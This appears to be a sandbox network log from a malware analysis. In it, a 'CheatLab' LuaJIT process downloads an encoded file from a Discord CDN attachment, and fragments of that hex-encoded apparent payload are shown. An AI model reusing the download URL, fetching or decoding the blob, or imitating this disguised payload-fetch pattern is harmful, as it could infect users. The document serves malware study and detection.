                                                    3192.168.2.549715162.159.130.23380C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Nov 4, 2023 01:30:15.792700052 CET3995OUTGET /attachments/1166694372084027482/1169541101917577226/2.txt HTTP/1.1
                                                    Content-Type: application/json
                                                    User-Agent: Sun
                                                    Host: cdn.discordapp.com
                                                    Cache-Control: no-cache
                                                    Nov 4, 2023 01:30:15.897494078 CET3997INHTTP/1.1 301 Moved Permanently
                                                    Date: Sat, 04 Nov 2023 00:30:15 GMT
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Cache-Control: max-age=3600
                                                    Expires: Sat, 04 Nov 2023 01:30:15 GMT
                                                    Location: https://cdn.discordapp.com/attachments/1166694372084027482/1169541101917577226/2.txt
                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                    Set-Cookie: __cf_bm=kCi2GYOZeYHyA10sUg_bOGn89f2AWCraeEUmTMI9E1Y-1699057815-0-Ae7NdqYh6y4Vn05KJQP1pqOYfL0VjeRaSbco9oI2dfRUDSdYbfh+TLhUFMMvRdmJhd3Po/8vja/n0aNCiZvYc6w=; path=/; expires=Sat, 04-Nov-23 01:00:15 GMT; domain=.discordapp.com; HttpOnly; SameSite=None
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SnZwbQXUCLxbCaKj%2FyUud3I5vgbcZsvWaDqB8HA8Q5xY6fo8oSg%2FfWe0qJbGNZM%2Fiot2lxIM3f90rHVX1F8fByCs16w3tnGilQwH4U8hs8OB3BL%2FEMhKrQ8qzr%2FogbVTXiIdLg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Set-Cookie: _cfuvid=s5rVrnaiMIWihEPRd4K_XSgaFFGJdcRN_pQvtzzHOtQ-1699057815839-0-604800000; path=/; domain=.discordapp.com; HttpOnly
                                                    Server: cloudflare
                                                    CF-RAY: 8208bf54ebec3b84-IAD
                                                    alt-svc: h3=":443"; ma=86400
                                                    Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    HTTPS Proxied Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    0192.168.2.549716162.159.130.233443C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe
                                                    TimestampkBytes transferredDirectionData
                                                    2023-11-04 00:30:16 UTC0OUTGET /attachments/1166694372084027482/1169541101917577226/2.txt HTTP/1.1
                                                    User-Agent: Sun
                                                    Cache-Control: no-cache
                                                    Host: cdn.discordapp.com
                                                    Connection: Keep-Alive
                                                    Cookie: __cf_bm=kCi2GYOZeYHyA10sUg_bOGn89f2AWCraeEUmTMI9E1Y-1699057815-0-Ae7NdqYh6y4Vn05KJQP1pqOYfL0VjeRaSbco9oI2dfRUDSdYbfh+TLhUFMMvRdmJhd3Po/8vja/n0aNCiZvYc6w=; _cfuvid=s5rVrnaiMIWihEPRd4K_XSgaFFGJdcRN_pQvtzzHOtQ-1699057815839-0-604800000
                                                    2023-11-04 00:30:16 UTC0INHTTP/1.1 200 OK
                                                    Date: Sat, 04 Nov 2023 00:30:16 GMT
                                                    Content-Type: text/plain; charset=utf-8
                                                    Content-Length: 1807199
                                                    Connection: close
                                                    CF-Ray: 8208bf57b8483b47-IAD
                                                    CF-Cache-Status: HIT
                                                    Accept-Ranges: bytes
                                                    Age: 48502
                                                    Cache-Control: public, max-age=31536000
                                                    Content-Disposition: attachment; filename="2.txt"
                                                    ETag: "f4206dcdebda4c957baa06ba3c826c08"
                                                    Expires: Sun, 03 Nov 2024 00:30:16 GMT
                                                    Last-Modified: Thu, 02 Nov 2023 07:38:47 GMT
                                                    Vary: Accept-Encoding
                                                    Alt-Svc: h3=":443"; ma=86400
                                                    x-goog-generation: 1698910727777197
                                                    x-goog-hash: crc32c=qEYgSw==
                                                    x-goog-hash: md5=9CBtzevaTJV7qga6PIJsCA==
                                                    x-goog-metageneration: 1
                                                    x-goog-storage-class: STANDARD
                                                    x-goog-stored-content-encoding: identity
                                                    x-goog-stored-content-length: 1807199
                                                    X-GUploader-UploadID: ABPtcPrZR6jFo6v-01nkpJ6zVE1tWRXI9dXTrpDef7JLPv3FYPxBjlZAQtSknLz9-Z_3gcZ3P8czoL7C8Q
                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MafbYun6lPwI24v%2FbDTkPd9lF5v8TAud4jeB48BSkKGbebY2P%2FkImjyUuDSS%2F39oeS9M9kqhng%2FuxwQBsAf0b%2FK0lpS53VhqzZWk%2FXUWP5IYW5VgJg2jl5azryDJ6z9p4uWR%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    2023-11-04 00:30:16 UTC1INData Raw: 38 35 2c 39 33 2c 31 30 30 2c 34 33 2c 35 32 2c 33 31 2c 34 65 2c 36 63 2c 35 30 2c 35 32 2c 36 62 2c 35 34 2c 31 35 39 2c 31 36 36 2c 36 32 2c 33 38 2c 66 63 2c 37 34 2c 35 61 2c 36 64 2c 34 62 2c 37 37 2c 34 33 2c 33 34 2c 37 32 2c 34 31 2c
                                                    Data Ascii: 85,93,100,43,52,31,4e,6c,50,52,6b,54,159,166,62,38,fc,74,5a,6d,4b,77,43,34,72,41,
                                                    2023-11-04 00:30:16 UTC1INData Raw: 35 31 2c 36 33 2c 35 35 2c 36 35 2c 35 38 2c 34 36 2c 33 38 2c 33 39 2c 37 30 2c 34 33 2c 34 66 2c 33 31 2c 34 65 2c 36 63 2c 34 63 2c 35 32 2c 36 62 2c 35 34 2c 35 61 2c 36 37 2c 36 32 2c 33 38 2c 34 34 2c 37 34 2c 35 61 2c 36 64 2c 34 62 2c 37 37 2c 34 33 2c 33 34 2c 33 32 2c 34 31 2c 35 31 2c 36 33 2c 31 33 35 2c 36 35 2c 35 38 2c 34 36 2c 34 36 2c 35 38 2c 31 32 61 2c 35 31 2c 34 66 2c 65 35 2c 35 37 2c 31 33 39 2c 36 64 2c 31 30 61 2c 36 63 2c 61 30 2c 31 32 37 2c 38 38 2c 62 36 2c 61 30 2c 61 64 2c 65 37 2c 37 61 2c 64 64 2c 62 64 2c 65 36 2c 61 61 2c 61 36 2c 39 33 2c 61 65 2c 37 31 2c 63 36 2c 62 36 2c 64 33 2c 63 36 2c 62 35 2c 61 63 2c 35 39 2c 64 32 2c 61 38 2c 36 66 2c 61 33 2c 63 33 2c 64 61 2c 36 63 2c 62 62 2c 64 39 2c 37 34 2c 39 65 2c 62
                                                    Data Ascii: 51,63,55,65,58,46,38,39,70,43,4f,31,4e,6c,4c,52,6b,54,5a,67,62,38,44,74,5a,6d,4b,77,43,34,32,41,51,63,135,65,58,46,46,58,12a,51,4f,e5,57,139,6d,10a,6c,a0,127,88,b6,a0,ad,e7,7a,dd,bd,e6,aa,a6,93,ae,71,c6,b6,d3,c6,b5,ac,59,d2,a8,6f,a3,c3,da,6c,bb,d9,74,9e,b
                                                    2023-11-04 00:30:16 UTC3INData Raw: 34 34 2c 37 34 2c 35 61 2c 36 64 2c 34 62 2c 37 37 2c 34 33 2c 33 34 2c 36 30 2c 62 35 2c 62 36 2c 64 62 2c 63 39 2c 36 35 2c 35 38 2c 34 36 2c 37 35 2c 64 63 2c 37 31 2c 34 33 2c 34 66 2c 34 31 2c 34 65 2c 36 63 2c 34 63 2c 66 36 2c 36 63 2c 35 34 2c 35 61 2c 36 62 2c 36 32 2c 33 38 2c 34 34 2c 37 34 2c 35 61 2c 36 64 2c 34 62 2c 37 37 2c 34 33 2c 33 34 2c 33 32 2c 34 31 2c 35 31 2c 36 33 2c 37 35 2c 36 35 2c 35 38 2c 61 36 2c 36 36 2c 61 62 2c 64 35 2c 61 66 2c 62 65 2c 39 34 2c 34 65 2c 36 63 2c 61 33 2c 37 36 2c 36 62 2c 35 34 2c 35 61 2c 31 32 37 2c 36 33 2c 33 38 2c 34 34 2c 39 61 2c 35 61 2c 36 64 2c 34 62 2c 31 31 66 2c 34 34 2c 33 34 2c 33 32 2c 34 31 2c 35 31 2c 36 33 2c 35 35 2c 36 35 2c 35 38 2c 34 36 2c 33 38 2c 33 39 2c 37 30 2c 34 33 2c 36
                                                    Data Ascii: 44,74,5a,6d,4b,77,43,34,60,b5,b6,db,c9,65,58,46,75,dc,71,43,4f,41,4e,6c,4c,f6,6c,54,5a,6b,62,38,44,74,5a,6d,4b,77,43,34,32,41,51,63,75,65,58,a6,66,ab,d5,af,be,94,4e,6c,a3,76,6b,54,5a,127,63,38,44,9a,5a,6d,4b,11f,44,34,32,41,51,63,55,65,58,46,38,39,70,43,6
                                                    2023-11-04 00:30:16 UTC4INData Raw: 33 2c 33 34 2c 33 32 2c 34 31 2c 35 31 2c 36 33 2c 35 35 2c 36 35 2c 35 38 2c 34 36 2c 33 38 2c 33 39 2c 37 30 2c 34 33 2c 34 66 2c 33 31 2c 34 65 2c 36 63 2c 34 63 2c 35 32 2c 36 62 2c 35 34 2c 35 61 2c 36 37 2c 36 32 2c 33 38 2c 34 34 2c 37 34 2c 35 61 2c 36 64 2c 34 62 2c 37 37 2c 34 33 2c 33 34 2c 33 32 2c 34 31 2c 35 31 2c 36 33 2c 35 35 2c 36 35 2c 35 38 2c 34 36 2c 33 38 2c 33 39 2c 37 30 2c 34 33 2c 34 66 2c 33 31 2c 34 65 2c 36 63 2c 34 63 2c 35 32 2c 36 62 2c 35 34 2c 35 61 2c 36 37 2c
                                                    Data Ascii: 3,34,32,41,51,63,55,65,58,46,38,39,70,43,4f,31,4e,6c,4c,52,6b,54,5a,67,62,38,44,74,5a,6d,4b,77,43,34,32,41,51,63,55,65,58,46,38,39,70,43,4f,31,4e,6c,4c,52,6b,54,5a,67,
                                                    2023-11-04 00:30:16 UTC4INData Raw: 36 32 2c 33 38 2c 34 34 2c 37 34 2c 35 61 2c 36 64 2c 34 62 2c 37 37 2c 34 33 2c 33 34 2c 33 32 2c 34 31 2c 35 31 2c 36 33 2c 35 35 2c 36 35 2c 35 38 2c 34 36 2c 33 38 2c 33 39 2c 37 30 2c 34 33 2c 34 66 2c 33 31 2c 34 65 2c 36 63 2c 34 63 2c 35 32 2c 36 62 2c 35 34 2c 35 61 2c 36 37 2c 36 32 2c 33 38 2c 34 34 2c 37 34 2c 35 61 2c 36 64 2c 34 62 2c 37 37 2c 34 33 2c 33 34 2c 33 32 2c 34 31 2c 35 31 2c 36 33 2c 35 35 2c 36 35 2c 35 38 2c 34 36 2c 38 64 2c 63 34 2c 31 35 63 2c 63 36 2c 31 33 62 2c 34 35 2c 64 37 2c 62 39 2c 31 33 38 2c 31 31 38 2c 62 30 2c 31 35 33 2c 35 61 2c 31 31 66 2c 36 33 2c 33 38 2c 34 34 2c 37 34 2c 64 66 2c 31 32 64 2c 62 66 2c 39 33 2c 31 30 61 2c 37 39 2c 31 32 61 2c 35 65 2c 35 31 2c 36 33 2c 35 35 2c 31 35 30 2c 36 31 2c 64 31
                                                    Data Ascii: 62,38,44,74,5a,6d,4b,77,43,34,32,41,51,63,55,65,58,46,38,39,70,43,4f,31,4e,6c,4c,52,6b,54,5a,67,62,38,44,74,5a,6d,4b,77,43,34,32,41,51,63,55,65,58,46,8d,c4,15c,c6,13b,45,d7,b9,138,118,b0,153,5a,11f,63,38,44,74,df,12d,bf,93,10a,79,12a,5e,51,63,55,150,61,d1
                                                    2023-11-04 00:30:16 UTC5INData Raw: 31 33 32 2c 64 39 2c 63 65 2c 31 36 36 2c 31 36 31 2c 31 33 37 2c 36 64 2c 37 34 2c 35 61 2c 36 64 2c 31 33 36 2c 38 36 2c 63 65 2c 62 39 2c 61 36 2c 31 34 30 2c 31 35 30 2c 31 36 32 2c 64 38 2c 31 34 64 2c 35 39 2c 63 66 2c 62 64 2c 61 64 2c 31 36 66 2c 31 34 32 2c 31 34 65 2c 62 34 2c 31 30 62 2c 65 30 2c 31 34 62 2c 31 35 31 2c 31 36 61 2c 35 34 2c 64 38 2c 36 62 2c 31 34 64 2c 31 31 65 2c 31 32 66 2c 31 35 38 2c 63 32 2c 66 31 2c 31 33 64 2c 62 38 2c 34 33 2c 63 31 2c 62 66 2c 35 35 2c 31 35 30 2c 31 36 32 2c 31 35 34 2c 31 34 64 2c 39 36 2c 35 39 2c 33 38 2c 33 39 2c 63 30 2c 61 62 2c 65 33 2c 31 32 33 2c 38 66 2c 36 63 2c 64 39 2c 64 66 2c 31 36 33 2c 31 35 32 2c 31 35 39 2c 31 36 36 2c 31 34 61 2c 36 35 2c 35 37 2c 37 34 2c 35 61 2c 62 64 2c 31 33
                                                    Data Ascii: 132,d9,ce,166,161,137,6d,74,5a,6d,136,86,ce,b9,a6,140,150,162,d8,14d,59,cf,bd,ad,16f,142,14e,b4,10b,e0,14b,151,16a,54,d8,6b,14d,11e,12f,158,c2,f1,13d,b8,43,c1,bf,55,150,162,154,14d,96,59,38,39,c0,ab,e3,123,8f,6c,d9,df,163,152,159,166,14a,65,57,74,5a,bd,13
                                                    2023-11-04 00:30:16 UTC7INData Raw: 33 2c 33 34 2c 33 32 2c 63 61 2c 64 65 2c 62 33 2c 31 35 34 2c 31 36 34 2c 31 35 37 2c 31 32 33 2c 33 64 2c 31 32 39 2c 31 36 64 2c 38 34 2c 34 66 2c 31 30 65 2c 61 62 2c 31 33 63 2c 31 31 33 2c 39 37 2c 66 66 2c 37 33 2c 36 64 2c 36 37 2c 36 32 2c 66 66 2c 38 39 2c 31 37 30 2c 39 64 2c 38 31 2c 34 62 2c 37 37 2c 61 62 2c 65 63 2c 31 32 34 2c 38 32 2c 35 31 2c 66 30 2c 61 32 2c 66 64 2c 31 34 30 2c 31 30 33 2c 34 39 2c 33 39 2c 37 30 2c 61 62 2c 31 32 37 2c 31 32 33 2c 38 66 2c 36 63 2c 64 39 2c 39 66 2c 31 34 37 2c 31 33 63 2c 31 30 61 2c 37 38 2c 36 32 2c 33 38 2c 61 63 2c 62 34 2c 31 34 64 2c 61 65 2c 34 62 2c 31 30 34 2c 39 30 2c 65 38 2c 31 31 61 2c 65 34 2c 36 32 2c 36 33 2c 35 35 2c 31 32 63 2c 39 64 2c 31 33 65 2c 35 31 2c 33 61 2c 37 30 2c 34 33
                                                    Data Ascii: 3,34,32,ca,de,b3,154,164,157,123,3d,129,16d,84,4f,10e,ab,13c,113,97,ff,73,6d,67,62,ff,89,170,9d,81,4b,77,ab,ec,124,82,51,f0,a2,fd,140,103,49,39,70,ab,127,123,8f,6c,d9,9f,147,13c,10a,78,62,38,ac,b4,14d,ae,4b,104,90,e8,11a,e4,62,63,55,12c,9d,13e,51,3a,70,43
                                                    2023-11-04 00:30:16 UTC8INData Raw: 31 32 33 2c 64 30 2c 66 36 2c 31 34 32 2c 31 33 33 2c 31 33 31 2c 63 36 2c 31 31 31 2c 64 37 2c 37 31 2c 31 32 63 2c 39 64 2c 63 36 2c 38 33 2c 33 39 2c 37 30 2c 34 33 2c 31 33 61 2c 33 61 2c 64 39 2c 62 39 2c 63 63 2c 64 35 2c 31 35 34 2c 35 35 2c 65 33 2c 62 34 2c 65 32 2c 62 62 2c 63 31 2c 66 34 2c 35 61 2c 65 62 2c 34 66 2c 31 36 32 2c 31 33 32 2c 31 31 66 2c 31 31 66 2c 61 39 2c 38 39 2c 31 35 38 2c 39 36 2c 36 35 2c 65 33 2c 39 33 2c 34 30 2c 31 32 31 2c 38 61 2c 35 33 2c 34 66 2c 33 31 2c 64 62 2c 62 39 2c 64 34 2c 31 33 61 2c 62 64 2c 36 34 2c 35 61 2c 36 37 2c 65 66 2c 38 35 2c 65 38 2c 31 35 63 2c 61 34 2c 37 64 2c 34 62 2c 37 37 2c 64 30 2c 38 31 2c 31 30 36 2c 31 32 39 2c 39 33 2c 37 33 2c 35 35 2c 36 35 2c 65 33 2c 38 62 2c 34 30 2c 63 34 2c
                                                    Data Ascii: 123,d0,f6,142,133,131,c6,111,d7,71,12c,9d,c6,83,39,70,43,13a,3a,d9,b9,cc,d5,154,55,e3,b4,e2,bb,c1,f4,5a,eb,4f,162,132,11f,11f,a9,89,158,96,65,e3,93,40,121,8a,53,4f,31,db,b9,d4,13a,bd,64,5a,67,ef,85,e8,15c,a4,7d,4b,77,d0,81,106,129,93,73,55,65,e3,8b,40,c4,
                                                    2023-11-04 00:30:16 UTC9INData Raw: 36 2c 34 34 2c 37 34 2c 31 32 30 2c 62 32 2c 31 34 61 2c 37 38 2c 61 62 2c 31 31 34 2c 31 32 37 2c 38 32 2c 35 31 2c 66 30 2c 61 32 2c 65 39 2c 31 34 30 2c 65 33 2c 34 36 2c 33 39 2c 37 30 2c 39 33 2c 62 37 2c 35 39 2c 31 34 34 2c 61 64 2c 34 63 2c 64 66 2c 66 38 2c 62 63 2c 31 35 39 2c 31 36 36 2c 31 36 31 2c 31 32 30 2c 64 30 2c 38 32 2c 35 61 2c 36 64 2c 39 62 2c 31 35 66 2c 37 39 2c 35 37 2c 33 32 2c 34 31 2c 64 34 2c 31 32 37 2c 35 64 2c 65 64 2c 39 64 2c 65 39 2c 63 35 2c 63 36 2c 64 38 2c 31 34 32 2c 31 34 65 2c 31 33 30 2c 31 33 36 2c 31 32 31 2c 35 61 2c 35 32 2c 36 62 2c 65 31 2c 61 37 2c 65 62 2c 31 34 61 2c 65 35 2c 35 32 2c 37 34 2c 35 61 2c 37 63 2c 31 30 31 2c 62 63 2c 65 36 2c 62 39 2c 66 32 2c 62 35 2c 36 64 2c 31 32 61 2c 39 61 2c 31 31
                                                    Data Ascii: 6,44,74,120,b2,14a,78,ab,114,127,82,51,f0,a2,e9,140,e3,46,39,70,93,b7,59,144,ad,4c,df,f8,bc,159,166,161,120,d0,82,5a,6d,9b,15f,79,57,32,41,d4,127,5d,ed,9d,e9,c5,c6,d8,142,14e,130,136,121,5a,52,6b,e1,a7,eb,14a,e5,52,74,5a,7c,101,bc,e6,b9,f2,b5,6d,12a,9a,11
                                                    2023-11-04 00:30:16 UTC11INData Raw: 37 2c 31 33 62 2c 31 34 61 2c 38 35 2c 35 31 2c 37 34 2c 35 61 2c 66 61 2c 39 38 2c 38 62 2c 31 32 62 2c 37 39 2c 33 66 2c 34 31 2c 35 31 2c 65 65 2c 39 61 2c 36 64 2c 65 33 2c 31 32 62 2c 39 35 2c 66 62 2c 39 38 2c 34 33 2c 31 31 62 2c 66 64 2c 31 31 61 2c 31 33 38 2c 31 31 38 2c 31 31 65 2c 31 33 37 2c 31 32 30 2c 31 32 36 2c 31 33 33 2c 31 32 65 2c 31 30 34 2c 39 39 2c 66 66 2c 31 34 36 2c 66 30 2c 31 33 37 2c 65 37 2c 63 63 2c 38 31 2c 63 32 2c 31 30 37 2c 39 36 2c 31 34 36 2c 35 36 2c 63 64 2c 37 38 2c 31 33 64 2c 37 39 2c 33 39 2c 66 64 2c 39 30 2c 31 33 33 2c 31 31 39 2c 31 32 34 2c 37 38 2c 34 63 2c 35 32 2c 31 33 32 2c 39 39 2c 31 33 36 2c 65 38 2c 36 33 2c 33 38 2c 34 34 2c 31 32 63 2c 35 62 2c 36 64 2c 34 62 2c 37 37 2c 63 38 2c 66 34 2c 61 36
                                                    Data Ascii: 7,13b,14a,85,51,74,5a,fa,98,8b,12b,79,3f,41,51,ee,9a,6d,e3,12b,95,fb,98,43,11b,fd,11a,138,118,11e,137,120,126,133,12e,104,99,ff,146,f0,137,e7,cc,81,c2,107,96,146,56,cd,78,13d,79,39,fd,90,133,119,124,78,4c,52,132,99,136,e8,63,38,44,12c,5b,6d,4b,77,c8,f4,a6
                                                    2023-11-04 00:30:16 UTC12INData Raw: 37 2c 35 32 2c 36 62 2c 64 66 2c 31 33 66 2c 63 34 2c 31 32 34 2c 35 63 2c 34 34 2c 31 34 30 2c 31 32 36 2c 31 33 39 2c 31 31 37 2c 31 34 33 2c 31 30 66 2c 31 30 30 2c 66 65 2c 31 30 64 2c 31 31 64 2c 31 32 66 2c 31 32 31 2c 31 33 31 2c 31 32 34 2c 31 31 32 2c 38 64 2c 63 34 2c 31 35 63 2c 63 36 2c 31 33 62 2c 39 31 2c 64 37 2c 62 39 2c 65 63 2c 31 32 66 2c 37 30 2c 61 63 2c 31 35 38 2c 61 38 2c 36 32 2c 31 31 35 2c 61 31 2c 31 35 34 2c 31 33 37 2c 37 32 2c 39 62 2c 31 37 35 2c 38 34 2c 33 34 2c 31 30 66 2c 39 65 2c 31 33 39 2c 63 62 2c 31 30 39 2c 31 35 63 2c 39 39 2c 34 36 2c 63 35 2c 38 36 2c 31 33 34 2c 31 32 62 2c 38 37 2c 33 63 2c 34 65 2c 36 63 2c 31 32 39 2c 35 37 2c 62 33 2c 31 35 32 2c 39 62 2c 36 37 2c 31 33 66 2c 39 35 2c 31 33 63 2c 31 33 61
                                                    Data Ascii: 7,52,6b,df,13f,c4,124,5c,44,140,126,139,117,143,10f,100,fe,10d,11d,12f,121,131,124,112,8d,c4,15c,c6,13b,91,d7,b9,ec,12f,70,ac,158,a8,62,115,a1,154,137,72,9b,175,84,34,10f,9e,139,cb,109,15c,99,46,c5,86,134,12b,87,3c,4e,6c,129,57,b3,152,9b,67,13f,95,13c,13a
                                                    2023-11-04 00:30:16 UTC13INData Raw: 33 38 2c 31 35 38 2c 35 63 2c 35 39 2c 33 31 2c 34 65 2c 66 39 2c 64 39 2c 61 61 2c 31 36 61 2c 31 35 33 2c 31 35 39 2c 31 34 66 2c 37 30 2c 34 32 2c 34 34 2c 37 34 2c 36 39 2c 31 32 33 2c 65 30 2c 65 65 2c 31 34 32 2c 31 33 33 2c 31 33 31 2c 63 36 2c 31 32 33 2c 64 37 2c 37 31 2c 31 32 63 2c 39 64 2c 66 61 2c 33 63 2c 33 39 2c 37 30 2c 34 33 2c 31 33 61 2c 33 61 2c 64 39 2c 62 31 2c 31 30 30 2c 64 35 2c 31 35 33 2c 35 35 2c 65 33 2c 61 63 2c 31 31 36 2c 62 62 2c 63 31 2c 31 32 38 2c 35 61 2c 65 62 2c 34 66 2c 31 36 32 2c 31 33 32 2c 31 31 66 2c 31 31 66 2c 31 31 65 2c 35 36 2c 63 33 2c 31 35 33 2c 61 36 2c 35 38 2c 31 32 33 2c 64 35 2c 36 39 2c 31 36 66 2c 31 34 32 2c 31 34 65 2c 62 65 2c 39 62 2c 31 32 38 2c 31 33 34 2c 31 32 35 2c 37 34 2c 35 34 2c 35
                                                    Data Ascii: 38,158,5c,59,31,4e,f9,d9,aa,16a,153,159,14f,70,42,44,74,69,123,e0,ee,142,133,131,c6,123,d7,71,12c,9d,fa,3c,39,70,43,13a,3a,d9,b1,100,d5,153,55,e3,ac,116,bb,c1,128,5a,eb,4f,162,132,11f,11f,11e,56,c3,153,a6,58,123,d5,69,16f,142,14e,be,9b,128,134,125,74,54,5
                                                    2023-11-04 00:30:16 UTC15INData Raw: 32 2c 31 34 61 2c 31 37 35 2c 31 34 32 2c 31 33 33 2c 62 66 2c 63 65 2c 31 31 35 2c 31 36 31 2c 31 35 34 2c 31 36 34 2c 31 34 30 2c 63 33 2c 34 30 2c 33 39 2c 37 30 2c 64 30 2c 64 63 2c 31 31 31 2c 31 34 63 2c 31 36 62 2c 31 34 62 2c 31 33 61 2c 64 64 2c 35 63 2c 35 61 2c 36 37 2c 37 31 2c 65 65 2c 64 39 2c 31 37 33 2c 31 35 38 2c 31 36 63 2c 31 34 61 2c 66 63 2c 31 31 35 2c 61 38 2c 35 61 2c 31 30 38 2c 64 36 2c 61 62 2c 31 35 34 2c 31 36 34 2c 31 35 37 2c 35 66 2c 33 38 2c 33 39 2c 37 30 2c 31 32 65 2c 35 65 2c 62 63 2c 64 33 2c 62 34 2c 31 34 62 2c 31 35 31 2c 31 36 61 2c 64 37 2c 31 34 32 2c 36 38 2c 65 62 2c 62 64 2c 38 63 2c 31 37 33 2c 31 35 39 2c 31 36 63 2c 63 65 2c 31 33 34 2c 38 62 2c 31 33 33 2c 31 33 31 2c 31 34 30 2c 35 31 2c 65 31 2c 35 39
                                                    Data Ascii: 2,14a,175,142,133,bf,ce,115,161,154,164,140,c3,40,39,70,d0,dc,111,14c,16b,14b,13a,dd,5c,5a,67,71,ee,d9,173,158,16c,14a,fc,115,a8,5a,108,d6,ab,154,164,157,5f,38,39,70,12e,5e,bc,d3,b4,14b,151,16a,d7,142,68,eb,bd,8c,173,159,16c,ce,134,8b,133,131,140,51,e1,59
                                                    2023-11-04 00:30:16 UTC16INData Raw: 38 2c 35 38 2c 33 31 2c 34 65 2c 65 66 2c 31 33 38 2c 36 65 2c 66 36 2c 31 32 30 2c 63 32 2c 36 37 2c 31 35 64 2c 37 39 2c 34 34 2c 31 35 63 2c 31 30 34 2c 37 33 2c 34 62 2c 37 37 2c 61 62 2c 31 30 31 2c 33 36 2c 34 31 2c 35 31 2c 63 62 2c 39 32 2c 36 64 2c 35 38 2c 34 36 2c 61 30 2c 39 35 2c 38 32 2c 34 33 2c 34 66 2c 62 63 2c 64 62 2c 39 34 2c 31 34 62 2c 31 35 31 2c 31 36 61 2c 31 33 63 2c 37 61 2c 31 36 34 2c 31 36 31 2c 31 33 37 2c 63 37 2c 31 36 30 2c 36 32 2c 31 34 61 2c 35 30 2c 31 33 66 2c 31 34 31 2c 37 35 2c 33 32 2c 31 31 65 2c 36 64 2c 38 37 2c 64 38 2c 31 35 31 2c 37 34 2c 64 31 2c 31 30 34 2c 61 31 2c 64 30 2c 31 33 65 2c 39 30 2c 33 31 2c 31 33 36 2c 65 31 2c 35 32 2c 35 32 2c 36 62 2c 64 66 2c 65 37 2c 38 66 2c 31 36 31 2c 31 33 37 2c 31
                                                    Data Ascii: 8,58,31,4e,ef,138,6e,f6,120,c2,67,15d,79,44,15c,104,73,4b,77,ab,101,36,41,51,cb,92,6d,58,46,a0,95,82,43,4f,bc,db,94,14b,151,16a,13c,7a,164,161,137,c7,160,62,14a,50,13f,141,75,32,11e,6d,87,d8,151,74,d1,104,a1,d0,13e,90,31,136,e1,52,52,6b,df,e7,8f,161,137,1
                                                    2023-11-04 00:30:16 UTC17INData Raw: 2c 31 33 64 2c 63 34 2c 35 64 2c 34 36 2c 33 38 2c 63 36 2c 66 35 2c 61 62 2c 31 34 65 2c 31 33 30 2c 31 34 64 2c 62 63 2c 64 37 2c 64 66 2c 39 33 2c 31 35 33 2c 31 35 39 2c 31 36 36 2c 31 34 61 2c 35 35 2c 31 33 38 2c 31 37 33 2c 31 35 39 2c 66 61 2c 64 38 2c 64 66 2c 31 34 32 2c 31 33 33 2c 31 33 31 2c 31 32 39 2c 39 33 2c 36 38 2c 35 35 2c 36 35 2c 64 62 2c 31 33 32 2c 34 30 2c 31 31 36 2c 37 35 2c 63 33 2c 31 34 64 2c 37 32 2c 34 65 2c 31 34 39 2c 36 38 2c 37 36 2c 66 36 2c 65 31 2c 38 32 2c 31 36 36 2c 31 36 31 2c 31 33 37 2c 31 32 63 2c 31 36 66 2c 31 34 65 2c 31 36 63 2c 31 34 61 2c 66 61 2c 31 32 66 2c 35 30 2c 62 64 2c 31 30 64 2c 62 39 2c 31 31 62 2c 31 35 31 2c 61 36 2c 35 38 2c 31 32 65 2c 31 31 34 2c 33 64 2c 37 30 2c 34 33 2c 62 37 2c 35 66
                                                    Data Ascii: ,13d,c4,5d,46,38,c6,f5,ab,14e,130,14d,bc,d7,df,93,153,159,166,14a,55,138,173,159,fa,d8,df,142,133,131,129,93,68,55,65,db,132,40,116,75,c3,14d,72,4e,149,68,76,f6,e1,82,166,161,137,12c,16f,14e,16c,14a,fa,12f,50,bd,10d,b9,11b,151,a6,58,12e,114,3d,70,43,b7,5f
                                                    2023-11-04 00:30:16 UTC19INData Raw: 39 65 2c 31 36 33 2c 31 32 61 2c 31 31 33 2c 31 34 33 2c 31 35 32 2c 31 31 62 2c 31 34 31 2c 66 39 2c 62 39 2c 31 33 32 2c 31 35 37 2c 35 61 2c 36 64 2c 34 62 2c 31 33 31 2c 65 33 2c 33 34 2c 33 32 2c 34 31 2c 64 63 2c 62 30 2c 36 31 2c 31 35 63 2c 31 33 37 2c 63 39 2c 31 31 65 2c 33 65 2c 31 36 37 2c 31 31 61 2c 64 30 2c 31 30 63 2c 31 34 63 2c 36 63 2c 34 63 2c 35 32 2c 65 63 2c 31 34 33 2c 31 33 33 2c 36 37 2c 36 32 2c 33 38 2c 63 37 2c 31 36 33 2c 38 61 2c 31 32 63 2c 31 34 30 2c 37 37 2c 34 33 2c 33 34 2c 62 35 2c 31 32 30 2c 39 39 2c 62 32 2c 39 35 2c 31 32 30 2c 64 32 2c 34 36 2c 33 38 2c 33 39 2c 37 66 2c 31 30 62 2c 31 31 30 2c 31 30 39 2c 39 39 2c 62 36 2c 31 30 64 2c 31 32 30 2c 66 62 2c 36 33 2c 31 32 32 2c 61 39 2c 61 61 2c 62 62 2c 31 30 61
                                                    Data Ascii: 9e,163,12a,113,143,152,11b,141,f9,b9,132,157,5a,6d,4b,131,e3,34,32,41,dc,b0,61,15c,137,c9,11e,3e,167,11a,d0,10c,14c,6c,4c,52,ec,143,133,67,62,38,c7,163,8a,12c,140,77,43,34,b5,120,99,b2,95,120,d2,46,38,39,7f,10b,110,109,99,b6,10d,120,fb,63,122,a9,aa,bb,10a
